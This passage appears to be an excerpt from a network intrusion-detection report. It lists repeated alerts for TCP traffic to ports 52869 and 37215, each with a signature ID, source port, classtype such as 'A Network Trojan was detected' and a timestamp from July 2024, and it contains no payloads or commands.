                      Source Port:53134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.846150
                      SID:2027339
                      Source Port:54866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.881517
                      SID:2027339
                      Source Port:50890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.433779
                      SID:2025132
                      Source Port:60010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.117397
                      SID:2027339
                      Source Port:41670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.238429
                      SID:2025132
                      Source Port:33582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.685689
                      SID:2027339
                      Source Port:33602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.644841
                      SID:2829579
                      Source Port:51668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2835222
                      Source Port:52902
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.002176
                      SID:2025132
                      Source Port:50694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.426127
                      SID:2025132
                      Source Port:60616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.074396
                      SID:2025132
                      Source Port:37698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:35.375826
                      SID:2027339
                      Source Port:59080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.119988
                      SID:2025132
                      Source Port:55248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.429308
                      SID:2831300
                      Source Port:59226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.166360
                      SID:2025132
                      Source Port:56306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.910306
                      SID:2027339
                      Source Port:58482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.441223
                      SID:2027339
                      Source Port:57384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.143657
                      SID:2835222
                      Source Port:56492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.644841
                      SID:2835222
                      Source Port:44232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.086216
                      SID:2835222
                      Source Port:48148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.497508
                      SID:2025132
                      Source Port:38676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.662240
                      SID:2025132
                      Source Port:54332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.462705
                      SID:2027339
                      Source Port:60936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.325933
                      SID:2027339
                      Source Port:58002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.535181
                      SID:2025132
                      Source Port:43316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.441411
                      SID:2027339
                      Source Port:39022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.351353
                      SID:2027339
                      Source Port:43872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.797833
                      SID:2025132
                      Source Port:60272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.920702
                      SID:2027339
                      Source Port:37972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.650758
                      SID:2831300
                      Source Port:41136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.587283
                      SID:2027339
                      Source Port:57730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.888787
                      SID:2027339
                      Source Port:50530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.165979
                      SID:2027339
                      Source Port:58318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.664378
                      SID:2829579
                      Source Port:49302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.447627
                      SID:2831300
                      Source Port:49590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:29.771660
                      SID:2025132
                      Source Port:51772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.465472
                      SID:2027339
                      Source Port:37998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.650758
                      SID:2027339
                      Source Port:50404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.512033
                      SID:2027339
                      Source Port:51666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.161234
                      SID:2027339
                      Source Port:56972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.826739
                      SID:2027339
                      Source Port:58546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.728680
                      SID:2831300
                      Source Port:45702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2829579
                      Source Port:37116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.152981
                      SID:2027339
                      Source Port:43760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.404785
                      SID:2829579
                      Source Port:47526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.628763
                      SID:2025132
                      Source Port:55030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.156296
                      SID:2025132
                      Source Port:36610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.922651
                      SID:2027339
                      Source Port:54264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2829579
                      Source Port:51970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.369944
                      SID:2831300
                      Source Port:42648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.574959
                      SID:2835222
                      Source Port:44546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.786723
                      SID:2025132
                      Source Port:38870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.542495
                      SID:2027339
                      Source Port:37638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.468265
                      SID:2027339
                      Source Port:39088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.333329
                      SID:2027339
                      Source Port:40926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2829579
                      Source Port:35396
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.424850
                      SID:2835222
                      Source Port:44092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:28.197579
                      SID:2027339
                      Source Port:45738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.457796
                      SID:2027339
                      Source Port:59522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.091811
                      SID:2027339
                      Source Port:54264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659617
                      SID:2829579
                      Source Port:36208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2829579
                      Source Port:40500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.133658
                      SID:2831300
                      Source Port:42852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:26.155233
                      SID:2025132
                      Source Port:41508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.864515
                      SID:2027339
                      Source Port:36648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.035056
                      SID:2025132
                      Source Port:54166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.808887
                      SID:2829579
                      Source Port:47828
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.392755
                      SID:2829579
                      Source Port:35030
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.773442
                      SID:2829579
                      Source Port:35610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.708217
                      SID:2027339
                      Source Port:40064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.433951
                      SID:2027339
                      Source Port:52954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.090337
                      SID:2025132
                      Source Port:47796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.162873
                      SID:2831300
                      Source Port:59080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.064674
                      SID:2027339
                      Source Port:52690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.910196
                      SID:2025132
                      Source Port:59688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.440287
                      SID:2831300
                      Source Port:34340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.682403
                      SID:2027339
                      Source Port:46686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.018611
                      SID:2831300
                      Source Port:42026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:34.258673
                      SID:2831300
                      Source Port:52018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.412131
                      SID:2829579
                      Source Port:47854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.180728
                      SID:2027339
                      Source Port:52806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.018252
                      SID:2027339
                      Source Port:49168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.957923
                      SID:2829579
                      Source Port:52242
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.412131
                      SID:2829579
                      Source Port:59394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.232736
                      SID:2027339
                      Source Port:60482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.213635
                      SID:2025132
                      Source Port:44354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2835222
                      Source Port:56752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.877705
                      SID:2025132
                      Source Port:36992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2835222
                      Source Port:50950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.724116
                      SID:2025132
                      Source Port:51922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.741345
                      SID:2027339
                      Source Port:39236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.145992
                      SID:2835222
                      Source Port:54376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.078658
                      SID:2027339
                      Source Port:36340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.503671
                      SID:2027339
                      Source Port:42322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.962602
                      SID:2027339
                      Source Port:60298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.943061
                      SID:2025132
                      Source Port:47224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.472268
                      SID:2831300
                      Source Port:55490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.491493
                      SID:2831300
                      Source Port:47318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:50.028546
                      SID:2027339
                      Source Port:57884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2829579
                      Source Port:35846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.595549
                      SID:2025132
                      Source Port:49858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.120505
                      SID:2027339
                      Source Port:40576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.086079
                      SID:2835222
                      Source Port:46914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.341196
                      SID:2027339
                      Source Port:40486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.320646
                      SID:2025132
                      Source Port:51984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.612113
                      SID:2831300
                      Source Port:49458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.334659
                      SID:2027339
                      Source Port:35794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.860933
                      SID:2025132
                      Source Port:55766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.664506
                      SID:2027339
                      Source Port:43274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.240839
                      SID:2027339
                      Source Port:50218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2835222
                      Source Port:49252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.246248
                      SID:2831300
                      Source Port:52912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.119639
                      SID:2829579
                      Source Port:54228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.827044
                      SID:2025132
                      Source Port:48506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.811975
                      SID:2027339
                      Source Port:40138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.876892
                      SID:2829579
                      Source Port:40354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2829579
                      Source Port:33862
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.457644
                      SID:2831300
                      Source Port:34304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:45.997240
                      SID:2025132
                      Source Port:35166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:01.438132
                      SID:2831300
                      Source Port:58972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.756790
                      SID:2027339
                      Source Port:45572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:49.853581
                      SID:2831300
                      Source Port:55646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.525196
                      SID:2025132
                      Source Port:38988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.572216
                      SID:2025132
                      Source Port:60848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.850972
                      SID:2027339
                      Source Port:50898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.185323
                      SID:2025132
                      Source Port:51958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.454427
                      SID:2831300
                      Source Port:51636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.459686
                      SID:2027339
                      Source Port:53016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.088978
                      SID:2027339
                      Source Port:40046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.698150
                      SID:2025132
                      Source Port:54962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.798798
                      SID:2027339
                      Source Port:38388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.556801
                      SID:2831300
                      Source Port:39346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.553922
                      SID:2027339
                      Source Port:41886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.164884
                      SID:2025132
                      Source Port:47870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.403310
                      SID:2835222
                      Source Port:40392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2835222
                      Source Port:37482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.023949
                      SID:2025132
                      Source Port:44036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:26.096786
                      SID:2025132
                      Source Port:42028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2829579
                      Source Port:43376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.719355
                      SID:2829579
                      Source Port:42064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.794030
                      SID:2025132
                      Source Port:33626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.602853
                      SID:2027339
                      Source Port:36134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2835222
                      Source Port:48334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.827209
                      SID:2829579
                      Source Port:47294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.470172
                      SID:2027339
                      Source Port:47588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.259708
                      SID:2027339
                      Source Port:55214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.447173
                      SID:2835222
                      Source Port:44146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2829579
                      Source Port:60164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.767395
                      SID:2829579
                      Source Port:56288
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.169467
                      SID:2831300
                      Source Port:49036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.817334
                      SID:2027339
                      Source Port:43182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.384402
                      SID:2025132
                      Source Port:48610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.251571
                      SID:2025132
                      Source Port:41154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.556779
                      SID:2831300
                      Source Port:44754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.314673
                      SID:2027339
                      Source Port:34160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.788416
                      SID:2027339
                      Source Port:36962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:40.564079
                      SID:2027339
                      Source Port:43712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.606471
                      SID:2025132
                      Source Port:47554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.825020
                      SID:2027339
                      Source Port:60074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2829579
                      Source Port:35434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.516035
                      SID:2027339
                      Source Port:56180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.515827
                      SID:2027339
                      Source Port:47546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2835222
                      Source Port:39850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.170112
                      SID:2025132
                      Source Port:37906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.586481
                      SID:2027339
                      Source Port:55382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.602644
                      SID:2831300
                      Source Port:32994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.606361
                      SID:2027339
                      Source Port:43486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2835222
                      Source Port:56802
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.324002
                      SID:2027339
                      Source Port:40084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.506329
                      SID:2027339
                      Source Port:41772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.587283
                      SID:2027339
                      Source Port:34940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.338625
                      SID:2025132
                      Source Port:53232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.107636
                      SID:2027339
                      Source Port:37462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.291407
                      SID:2027339
                      Source Port:54262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.025383
                      SID:2025132
                      Source Port:47778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.345531
                      SID:2025132
                      Source Port:42486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:26.096786
                      SID:2027339
                      Source Port:39608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.800446
                      SID:2835222
                      Source Port:50684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.174966
                      SID:2025132
                      Source Port:34930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.929510
                      SID:2831300
                      Source Port:50564
                      Destination Port:52869
                      Protocol:TCP
